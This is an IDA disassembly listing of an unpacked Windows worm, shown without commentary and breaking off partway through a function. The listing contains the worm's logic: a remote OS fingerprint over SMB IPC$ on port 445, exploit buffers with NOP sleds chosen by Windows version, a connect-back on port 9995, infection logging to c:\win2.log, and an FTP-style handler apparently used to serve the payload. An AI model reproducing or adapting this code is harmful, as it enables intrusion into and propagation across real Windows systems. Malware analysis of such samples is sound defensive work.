;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 83893BD25D41883E93D539544EF892F9
; File Name : u:\work\83893bd25d41883e93d539544ef892f9_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00008000 ( 32768.)
; Section size in file : 00008000 ( 32768.)
; Offset to raw data for section: 00001000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
; OS type : MS Windows
; Application type: Executable 32bit
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
sub_401000 proc near ; CODE XREF: sub_40127D+7C�p
; sub_401F2E:loc_401F9B�p ...
mov eax, dword_406F40
imul eax, 343FDh
add eax, 279EC3h
mov dword_406F40, eax
shr eax, 10h
and eax, 7FFFh
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
sub_40101E proc near ; CODE XREF: WinMain(x,x,x,x)+1F�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_406F40, eax
retn
sub_40101E endp
; =============== S U B R O U T I N E =======================================
sub_401028 proc near ; CODE XREF: WinMain(x,x,x,x)+24�p
var_190 = byte ptr -190h
sub esp, 190h
lea eax, [esp+190h+var_190]
push eax
push 101h
call dword_4050F0 ; WSAStartup
add esp, 190h
retn
sub_401028 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401045 proc near ; CODE XREF: sub_4010D2+4C�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
push edi
push [ebp+arg_0]
call dword_405120 ; inet_addr
movsx ecx, al
mov [ebp+arg_0], eax
movsx edx, byte ptr [ebp+arg_0+2]
movsx esi, byte ptr [ebp+arg_0+3]
movsx edi, ah
test ecx, ecx
mov eax, 100h
jge short loc_40106F
add ecx, eax
loc_40106F: ; CODE XREF: sub_401045+26�j
test edi, edi
jge short loc_401075
add edi, eax
loc_401075: ; CODE XREF: sub_401045+2C�j
test edx, edx
jge short loc_40107B
add edx, eax
loc_40107B: ; CODE XREF: sub_401045+32�j
test esi, esi
jge short loc_401081
add esi, eax
loc_401081: ; CODE XREF: sub_401045+38�j
push 1
cmp ecx, 7Fh
pop eax
jnz short loc_401095
test edi, edi
jnz short loc_4010CE
test edx, edx
jnz short loc_4010CE
cmp esi, eax
jz short loc_4010CC
loc_401095: ; CODE XREF: sub_401045+42�j
cmp ecx, 0Ah
jz short loc_4010CC
cmp ecx, 0ACh
jnz short loc_4010AC
cmp edi, 0Fh
jle short loc_4010CE
cmp edi, 20h
jl short loc_4010CC
loc_4010AC: ; CODE XREF: sub_401045+5B�j
cmp ecx, 0C0h
jnz short loc_4010BC
cmp edi, 0A8h
jz short loc_4010CC
loc_4010BC: ; CODE XREF: sub_401045+6D�j
cmp ecx, 0A9h
jnz short loc_4010CE
cmp edi, 0FEh
jnz short loc_4010CE
loc_4010CC: ; CODE XREF: sub_401045+4E�j
; sub_401045+53�j ...
xor al, al
loc_4010CE: ; CODE XREF: sub_401045+46�j
; sub_401045+4A�j ...
pop edi
pop esi
pop ebp
retn
sub_401045 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010D2 proc near ; CODE XREF: sub_40127D+9C�p
; sub_401F2E+39�p
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 100h
push ebx
push esi
push edi
lea eax, [ebp+var_100]
push 0FFh
push eax
call dword_405118 ; gethostname
test eax, eax
jnz short loc_401136
lea eax, [ebp+var_100]
push eax
call dword_405124 ; gethostbyname
mov edi, eax
xor esi, esi
cmp edi, esi
jz short loc_401136
mov eax, [edi+0Ch]
cmp [eax], esi
jz short loc_401136
loc_401110: ; CODE XREF: sub_4010D2+60�j
mov eax, [esi+eax]
push dword ptr [eax]
call dword_40511C ; inet_ntoa
mov ebx, eax
push ebx
call sub_401045
test al, al
pop ecx
jnz short loc_40113D
mov eax, [edi+0Ch]
add esi, 4
cmp dword ptr [esi+eax], 0
jnz short loc_401110
jmp short loc_401139
; ---------------------------------------------------------------------------
loc_401136: ; CODE XREF: sub_4010D2+20�j
; sub_4010D2+35�j ...
mov ebx, [ebp+arg_0]
loc_401139: ; CODE XREF: sub_4010D2+62�j
test ebx, ebx
jz short loc_401140
loc_40113D: ; CODE XREF: sub_4010D2+54�j
push ebx
jmp short loc_401145
; ---------------------------------------------------------------------------
loc_401140: ; CODE XREF: sub_4010D2+69�j
push offset a127_0_0_1 ; "127.0.0.1"
loc_401145: ; CODE XREF: sub_4010D2+6C�j
push [ebp+arg_0]
call dword_405018 ; lstrcpyA
pop edi
pop esi
pop ebx
leave
retn
sub_4010D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401153 proc near ; CODE XREF: sub_401F2E+126�p
Dst = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push 10h ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push 1BDh
call dword_405108 ; ntohs
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_4011D5
mov [ebp+var_C], eax
push 8 ; Size
lea eax, [ebp+var_8]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 10h
push 6
push 1
pop ebx
push ebx
push 2
call dword_40510C ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_4011B4
xor al, al
jmp short loc_4011D1
; ---------------------------------------------------------------------------
loc_4011B4: ; CODE XREF: sub_401153+5B�j
lea eax, [ebp+Dst]
push 10h
push eax
push esi
call dword_405110 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_4011C8
xor bl, bl
loc_4011C8: ; CODE XREF: sub_401153+71�j
push esi
call dword_405114 ; closesocket
mov al, bl
loc_4011D1: ; CODE XREF: sub_401153+5F�j
pop esi
pop ebx
leave
retn
sub_401153 endp
; =============== S U B R O U T I N E =======================================
sub_4011D5 proc near ; CODE XREF: sub_401153+30�p
; sub_40127D+34�p ...
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
push edi
call dword_405120 ; inet_addr
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4011F2
test esi, esi
jnz short loc_401204
cmp byte ptr [edi], 30h
jz short loc_40120B
loc_4011F2: ; CODE XREF: sub_4011D5+12�j
push edi
call dword_405124 ; gethostbyname
test eax, eax
jz short loc_401204
mov eax, [eax+0Ch]
mov eax, [eax]
mov esi, [eax]
loc_401204: ; CODE XREF: sub_4011D5+16�j
; sub_4011D5+26�j
cmp esi, 0FFFFFFFFh
jnz short loc_40120B
xor esi, esi
loc_40120B: ; CODE XREF: sub_4011D5+1B�j
; sub_4011D5+32�j
mov eax, esi
pop edi
pop esi
retn
sub_4011D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401210 proc near ; CODE XREF: sub_40127D+F9�p
Str = byte ptr -14h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
inc dword_406F44
push edi
push dword_406F44
lea eax, [ebp+Str]
push offset aI ; "%i"
push eax
call dword_4050E0 ; wsprintfA
add esp, 0Ch
push 0
push offset aCWin2_log ; "c:\\win2.log"
call dword_405024 ; _lcreat
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_40127A
lea eax, [ebp+Str]
push esi
push eax ; Str
call _strlen
mov esi, dword_405020
pop ecx
push eax
lea eax, [ebp+Str]
push eax
push edi
call esi ; _lwrite
push [ebp+arg_0] ; Str
call _strlen
pop ecx
push eax
push [ebp+arg_0]
push edi
call esi ; _lwrite
push edi
call dword_40501C ; _lclose
pop esi
loc_40127A: ; CODE XREF: sub_401210+37�j
pop edi
leave
retn
sub_401210 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40127D proc near ; CODE XREF: sub_401A84+7B�p
var_348 = dword ptr -348h
Str = byte ptr -33Ch
var_110 = byte ptr -110h
Dst = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 33Ch
push ebx
push edi
xor ebx, ebx
push 10h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push 270Bh
call dword_405108 ; ntohs
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_4011D5
mov [ebp+var_C], eax
push 8 ; Size
lea eax, [ebp+var_8]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 10h
push 6
push 1
push 2
call dword_40510C ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_4012E2
xor al, al
jmp loc_401394
; ---------------------------------------------------------------------------
loc_4012E2: ; CODE XREF: sub_40127D+5C�j
lea eax, [ebp+Dst]
push 10h
push eax
push edi
call dword_405110 ; connect
cmp eax, 0FFFFFFFFh
jz loc_40138B
push esi
call sub_401000
mov esi, eax
lea eax, [ebp+var_110]
push offset Source
push eax
call dword_405018 ; lstrcpyA
lea eax, [ebp+var_110]
push eax
call sub_4010D2
push esi
lea eax, [ebp+var_110]
push esi
push eax
push off_406030
lea eax, [ebp+Str]
push eax
call dword_4050E0 ; wsprintfA
lea eax, [ebp+Str]
xor esi, esi
push eax ; Str
call _strlen
add esp, 1Ch
test eax, eax
jbe short loc_401373
loc_40134F: ; CODE XREF: sub_40127D+F4�j
push ebx
lea eax, [ebp+esi+Str]
push 1
push eax
push edi
call dword_405104 ; send
lea eax, [ebp+Str]
inc esi
push eax ; Str
call _strlen
cmp esi, eax
pop ecx
jb short loc_40134F
loc_401373: ; CODE XREF: sub_40127D+D0�j
push [ebp+arg_0]
call sub_401210
mov [esp+348h+var_348], 3E8h
call dword_405028 ; Sleep
mov bl, 1
pop esi
loc_40138B: ; CODE XREF: sub_40127D+75�j
push edi
call dword_405114 ; closesocket
mov al, bl
loc_401394: ; CODE XREF: sub_40127D+60�j
pop edi
pop ebx
leave
retn
sub_40127D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401398 proc near ; CODE XREF: sub_401A84+15�p
var_744 = byte ptr -744h
var_714 = byte ptr -714h
Src = byte ptr -104h
var_103 = byte ptr -103h
var_B4 = byte ptr -0B4h
var_B1 = byte ptr -0B1h
var_87 = byte ptr -87h
var_85 = byte ptr -85h
var_84 = byte ptr -84h
Str = byte ptr -3Ch
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
Dst = byte ptr -0Ch
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 744h
push ebx
push esi
push edi
push offset Source
push [ebp+arg_4]
call dword_405018 ; lstrcpyA
push [ebp+arg_0]
lea eax, [ebp+Str]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax
call dword_4050E0 ; wsprintfA
add esp, 0Ch
xor edi, edi
xor ecx, ecx
lea eax, [ebp+var_103]
loc_4013D1: ; CODE XREF: sub_401398+49�j
mov dl, [ebp+ecx+Str]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_4013D1
push 60h ; Size
lea eax, [ebp+var_B4]
push offset dword_4063E4 ; Src
push eax ; Dst
call _memcpy
lea eax, [ebp+Str]
push eax ; Str
call _strlen
shl eax, 1
push eax ; Size
lea eax, [ebp+Src]
push eax ; Src
lea eax, [ebp+var_84]
push eax ; Dst
call _memcpy
add esp, 1Ch
lea eax, [ebp+Str]
push 9 ; Size
push (offset aC+3) ; Src
push eax ; Str
call _strlen
pop ecx
lea eax, [ebp+eax*2+var_85]
push eax ; Dst
call _memcpy
lea eax, [ebp+Str]
push eax ; Str
call _strlen
add al, 1Ah
push 1 ; Size
shl al, 1
mov [ebp+var_2], al
lea eax, [ebp+var_2]
push eax ; Src
lea eax, [ebp+var_B1]
push eax ; Dst
call _memcpy
lea eax, [ebp+Str]
push eax ; Str
call _strlen
shl al, 1
add al, 9
push 1 ; Size
mov [ebp+var_1], al
lea eax, [ebp+var_1]
push eax ; Src
lea eax, [ebp+var_87]
push eax ; Dst
call _memcpy
add esp, 2Ch
push [ebp+arg_0]
call dword_405124 ; gethostbyname
mov ebx, eax
cmp ebx, edi
jz loc_401554
push edi
push 1
push 2
loc_401495: ; DATA XREF: .text:off_4065D8�o
call dword_40510C ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp+arg_0], esi
jz loc_401554
push 1BDh
mov [ebp+var_14], 2
call dword_405108 ; ntohs
mov [ebp+var_12], ax
mov eax, [ebx+0Ch]
push 8 ; Size
push edi ; Val
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_10], eax
lea eax, [ebp+Dst]
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_14]
push 10h
push eax
push esi
call dword_405110 ; connect
cmp eax, 0FFFFFFFFh
jz short loc_401554
mov ebx, dword_405104
push edi
push 89h
push offset dword_4061CC
push esi
call ebx ; send
cmp eax, 0FFFFFFFFh
jz short loc_401554
push edi
mov edi, 640h
lea eax, [ebp+var_744]
push edi
push eax
push esi
mov esi, dword_405100
call esi ; recv
push 0
push 0A8h
push offset dword_406258
push [ebp+arg_0]
call ebx ; send
cmp eax, 0FFFFFFFFh
jz short loc_401554
push 0
lea eax, [ebp+var_744]
push edi
push eax
push [ebp+arg_0]
call esi ; recv
push 0
push 0DEh
push offset dword_406304
push [ebp+arg_0]
call ebx ; send
cmp eax, 0FFFFFFFFh
jnz short loc_401558
loc_401554: ; CODE XREF: sub_401398+F2�j
; sub_401398+10B�j ...
xor eax, eax
jmp short loc_401599
; ---------------------------------------------------------------------------
loc_401558: ; CODE XREF: sub_401398+1BA�j
push 0
lea eax, [ebp+var_744]
push edi
push eax
push [ebp+arg_0]
call esi ; recv
push 46h
lea esi, [ebp+var_714]
pop edi
loc_401570: ; CODE XREF: sub_401398+1F3�j
movsx eax, byte ptr [esi]
push eax
push [ebp+arg_4]
push offset aSC ; "%s%c"
push [ebp+arg_4]
call dword_4050E0 ; wsprintfA
add esp, 10h
inc esi
inc esi
dec edi
jnz short loc_401570
push [ebp+arg_0]
call dword_405114 ; closesocket
push 1
pop eax
loc_401599: ; CODE XREF: sub_401398+1BE�j
pop edi
pop esi
pop ebx
leave
retn
sub_401398 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40159E proc near ; CODE XREF: sub_401A84+3B�p
; sub_401A84+5E�p ...
var_89C4 = byte ptr -89C4h
var_895C = byte ptr -895Ch
var_68EC = byte ptr -68ECh
var_687C = byte ptr -687Ch
var_5DB8 = byte ptr -5DB8h
var_4814 = byte ptr -4814h
var_4813 = byte ptr -4813h
var_3780 = byte ptr -3780h
var_2CBC = byte ptr -2CBCh
var_2CBB = byte ptr -2CBBh
var_2CB8 = byte ptr -2CB8h
var_24D4 = byte ptr -24D4h
var_24C4 = byte ptr -24C4h
var_21A0 = byte ptr -21A0h
var_219C = byte ptr -219Ch
var_2190 = byte ptr -2190h
var_1F08 = byte ptr -1F08h
var_1E8C = byte ptr -1E8Ch
var_16BC = byte ptr -16BCh
var_1211 = byte ptr -1211h
var_F24 = byte ptr -0F24h
var_E84 = byte ptr -0E84h
var_778 = dword ptr -778h
var_768 = byte ptr -768h
var_754 = byte ptr -754h
Src = byte ptr -114h
var_113 = byte ptr -113h
Dst = byte ptr -0C4h
var_C1 = byte ptr -0C1h
var_97 = byte ptr -97h
var_95 = byte ptr -95h
var_94 = byte ptr -94h
Str = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 89C4h
call __alloca_probe
mov eax, dword_406A30
push [ebp+arg_0]
mov [ebp+var_14], eax
mov eax, dword_406A34
mov [ebp+var_10], eax
lea eax, [ebp+Str]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax
call dword_4050E0 ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_113]
loc_4015D8: ; CODE XREF: sub_40159E+4A�j
mov dl, [ebp+ecx+Str]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_4015D8
push ebx
push esi
push edi
push 60h ; Size
lea eax, [ebp+Dst]
push offset dword_4063E4 ; Src
push eax ; Dst
call _memcpy
lea eax, [ebp+Str]
push eax ; Str
call _strlen
shl eax, 1
push eax ; Size
lea eax, [ebp+Src]
push eax ; Src
lea eax, [ebp+var_94]
push eax ; Dst
call _memcpy
add esp, 1Ch
lea eax, [ebp+Str]
push 9 ; Size
push (offset aC+3) ; Src
push eax ; Str
call _strlen
pop ecx
lea eax, [ebp+eax*2+var_95]
push eax ; Dst
call _memcpy
lea eax, [ebp+Str]
push eax ; Str
call _strlen
add al, 1Ah
push 1 ; Size
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax ; Src
lea eax, [ebp+var_C1]
push eax ; Dst
call _memcpy
lea eax, [ebp+Str]
push eax ; Str
call _strlen
shl al, 1
add al, 9
push 1 ; Size
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax ; Src
lea eax, [ebp+var_97]
push eax ; Dst
call _memcpy
add esp, 2Ch
push 270Bh
call dword_405108 ; ntohs
xor eax, 9999h
push 2 ; Size
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax ; Src
push offset dword_4060E4 ; Dst
call _memcpy
mov ebx, [ebp+arg_4]
add esp, 0Ch
cmp ebx, 1
jz short loc_40171A
cmp ebx, 2
jz short loc_40171A
push 7D0h ; Size
lea eax, [ebp+var_F24]
push 90h ; Val
push eax ; Dst
call _memset
mov esi, offset Str ; "ë"
push esi ; Str
call _strlen
push eax ; Size
lea eax, [ebp+var_E84]
push esi ; Src
push eax ; Dst
call _memcpy
lea eax, [ebp+var_14]
push eax ; Str
call _strlen
push eax ; Size
lea eax, [ebp+var_14]
push eax ; Src
lea eax, [ebp+var_768]
push eax ; Dst
call _memcpy
add esp, 2Ch
imul ebx, 3Ch
mov eax, dword_406810[ebx]
mov [ebp+var_778], eax
jmp loc_4017EE
; ---------------------------------------------------------------------------
loc_40171A: ; CODE XREF: sub_40159E+115�j
; sub_40159E+11A�j
mov edi, 0DACh
lea eax, [ebp+var_2CB8]
push edi ; Size
push 90h ; Val
push eax ; Dst
call _memset
imul ebx, 3Ch
push 4 ; Size
lea eax, [ebp+var_24D4]
lea ebx, dword_406810[ebx]
push ebx ; Src
push eax ; Dst
call _memcpy
mov esi, offset Str ; "ë"
push esi ; Str
call _strlen
push eax ; Size
lea eax, [ebp+var_24C4]
push esi ; Src
push eax ; Dst
call _memcpy
push 4 ; Size
lea eax, [ebp+var_21A0]
push offset dword_406A28 ; Src
push eax ; Dst
call _memcpy
push 4 ; Size
lea eax, [ebp+var_219C]
push ebx ; Src
push eax ; Dst
call _memcpy
add esp, 40h
push esi ; Str
call _strlen
push eax ; Size
lea eax, [ebp+var_2190]
push esi ; Src
push eax ; Dst
call _memcpy
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4813]
loc_4017A6: ; CODE XREF: sub_40159E+21A�j
mov dl, [ebp+ecx+var_2CB8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, edi
jl short loc_4017A6
and [ebp+var_2CBC], 0
and [ebp+var_2CBB], 0
mov esi, 1C52h
lea eax, [ebp+var_89C4]
push esi ; Size
push 31h ; Val
push eax ; Dst
call _memset
push esi ; Size
lea eax, [ebp+var_68EC]
push 31h ; Val
push eax ; Dst
call _memset
add esp, 18h
loc_4017EE: ; CODE XREF: sub_40159E+177�j
push 0
push 1
push 2
call dword_40510C ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_4], edi
jz loc_401A7D
push 1BDh
mov [ebp+var_24], 2
call dword_405108 ; ntohs
push [ebp+arg_0]
mov [ebp+var_22], ax
call sub_4011D5
mov [ebp+var_20], eax
xor ebx, ebx
push 8 ; Size
lea eax, [ebp+var_1C]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 10h
lea eax, [ebp+var_24]
push 10h
push eax
push edi
call dword_405110 ; connect
cmp eax, 0FFFFFFFFh
jz loc_401A7D
mov esi, dword_405104
push ebx
push 89h
push offset dword_4061CC
push edi
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push ebx
mov ebx, 640h
lea eax, [ebp+var_754]
push ebx
push eax
push edi
mov edi, dword_405100
call edi ; recv
push 0
push 0A8h
push offset dword_406258
push [ebp+var_4]
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; recv
push 0
push 0DEh
push offset dword_406304
push [ebp+var_4]
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; recv
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+Dst]
push eax
push [ebp+var_4]
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; recv
push 0
push 68h
push offset dword_406448
push [ebp+var_4]
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; recv
push 0
push 0A0h
push offset dword_4064B4
push [ebp+var_4]
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; recv
cmp [ebp+arg_4], 1
jz short loc_4019BB
cmp [ebp+arg_4], 2
jz short loc_4019BB
push 7Ch ; Size
lea eax, [ebp+var_1F08]
push offset dword_406558 ; Src
push eax ; Dst
call _memcpy
lea eax, [ebp+var_F24]
push 7D0h ; Size
push eax ; Src
lea eax, [ebp+var_1E8C]
push eax ; Dst
call _memcpy
push 90h ; Size
lea eax, [ebp+var_16BC]
push offset off_4065D8 ; Src
push eax ; Dst
call _memcpy
add esp, 24h
and [ebp+var_1211], 0
lea eax, [ebp+var_1F08]
push 0
push 0CF8h
jmp loc_401A5E
; ---------------------------------------------------------------------------
loc_4019BB: ; CODE XREF: sub_40159E+3B8�j
; sub_40159E+3BE�j
push 68h ; Size
lea eax, [ebp+var_89C4]
push offset dword_40666C ; Src
push eax ; Dst
call _memcpy
lea eax, [ebp+var_4814]
push 1B5Ah ; Size
push eax ; Src
lea eax, [ebp+var_895C]
push eax ; Dst
call _memcpy
push 70h ; Size
lea eax, [ebp+var_68EC]
push offset dword_4066D8 ; Src
push eax ; Dst
call _memcpy
lea eax, [ebp+var_3780]
push 0A5Eh ; Size
push eax ; Src
lea eax, [ebp+var_687C]
push eax ; Dst
call _memcpy
push 84h ; Size
lea eax, [ebp+var_5DB8]
push offset dword_40674C ; Src
push eax ; Dst
call _memcpy
add esp, 3Ch
lea eax, [ebp+var_89C4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call esi ; send
cmp eax, 0FFFFFFFFh
jz short loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; recv
push 0
push 0FDCh
lea eax, [ebp+var_68EC]
loc_401A5E: ; CODE XREF: sub_40159E+418�j
push eax
push [ebp+var_4]
call esi ; send
cmp eax, 0FFFFFFFFh
jz short loc_401A7D
push 3E8h
call dword_405028 ; Sleep
push [ebp+var_4]
call dword_405114 ; closesocket
loc_401A7D: ; CODE XREF: sub_40159E+264�j
; sub_40159E+2AB�j ...
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_40159E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401A84 proc near ; CODE XREF: WinMain(x,x,x,x)+3A�p
Str = byte ptr -84h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 84h
push esi
mov esi, [ebp+arg_0]
lea eax, [ebp+Str]
push eax
push esi
call sub_401398
pop ecx
cmp eax, 1
pop ecx
jnz short loc_401B05
lea eax, [ebp+Str]
push offset SubStr ; "5.1"
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_401AC8
push 0
push esi
call sub_40159E
push 0
jmp short loc_401AF5
; ---------------------------------------------------------------------------
loc_401AC8: ; CODE XREF: sub_401A84+36�j
lea eax, [ebp+Str]
push offset a5_0 ; "5.0"
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_401AEB
push 1
push esi
call sub_40159E
push 1
jmp short loc_401AF5
; ---------------------------------------------------------------------------
loc_401AEB: ; CODE XREF: sub_401A84+59�j
push 2
push esi
call sub_40159E
push 2
loc_401AF5: ; CODE XREF: sub_401A84+42�j
; sub_401A84+65�j
push esi
call sub_40159E
add esp, 10h
push esi
call sub_40127D
pop ecx
loc_401B05: ; CODE XREF: sub_401A84+1F�j
pop esi
leave
retn
sub_401A84 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401B08 proc near ; CODE XREF: sub_401F2E+115�p
var_24 = byte ptr -24h
var_1C = dword ptr -1Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 24h
push esi
call sub_404D52 ; IcmpCreateFile
push [ebp+arg_4]
mov esi, eax
lea eax, [ebp+var_24]
or [ebp+var_1C], 0FFFFFFFFh
push 24h
push eax
xor eax, eax
push eax
push eax
push eax
push [ebp+arg_0]
push esi
call sub_404D4C ; IcmpSendEcho
test eax, eax
jnz short loc_401B3A
or eax, 0FFFFFFFFh
jmp short loc_401B43
; ---------------------------------------------------------------------------
loc_401B3A: ; CODE XREF: sub_401B08+2B�j
push esi
call sub_404D46 ; IcmpCloseHandle
mov eax, [ebp+var_1C]
loc_401B43: ; CODE XREF: sub_401B08+30�j
pop esi
leave
retn
sub_401B08 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401B46 proc near ; DATA XREF: sub_401EA3+74�o
var_8E4 = byte ptr -8E4h
Str = byte ptr -4E4h
Source = byte ptr -4E0h
Dest = byte ptr -0E4h
var_60 = byte ptr -60h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
Dst = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
Delim = byte ptr -4
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8E4h
push ebx
mov ebx, [ebp+arg_0]
cmp ebx, 0FFFFFFFFh
jz loc_401E67
push esi
push edi
push 0
push off_4068D0 ; Str
call _strlen
mov esi, dword_405104
pop ecx
push eax
push off_4068D0
push ebx
call esi ; send
mov edi, [ebp+arg_0]
jmp short loc_401B84
; ---------------------------------------------------------------------------
loc_401B81: ; CODE XREF: sub_401B46+310�j
mov ebx, [ebp+arg_0]
loc_401B84: ; CODE XREF: sub_401B46+39�j
push 0
lea eax, [ebp+Str]
push 400h
push eax
push ebx
call dword_405100 ; recv
and [ebp+eax+Str], 0
mov [ebp+var_10], eax
lea eax, [ebp+Str]
push offset aUser ; "USER"
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_401BD5
push 0
push off_4068D4 ; Str
call _strlen
pop ecx
push eax
push off_4068D4
jmp loc_401E4F
; ---------------------------------------------------------------------------
loc_401BD5: ; CODE XREF: sub_401B46+73�j
lea eax, [ebp+Str]
push offset aPass ; "PASS"
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_401C06
push 0
push off_4068D8 ; Str
call _strlen
pop ecx
push eax
push off_4068D8
jmp loc_401E4F
; ---------------------------------------------------------------------------
loc_401C06: ; CODE XREF: sub_401B46+A4�j
lea eax, [ebp+Str]
push offset aPort ; "PORT"
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz loc_401CE2
lea eax, [ebp+Source]
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _strcpy
mov ax, word_406A5C
mov word ptr [ebp+Delim], ax
lea eax, [ebp+Delim]
push eax ; Delim
lea eax, [ebp+Dest]
push eax ; Str
call _strtok
add esp, 10h
mov ebx, eax
xor edi, edi
loc_401C55: ; CODE XREF: sub_401B46+159�j
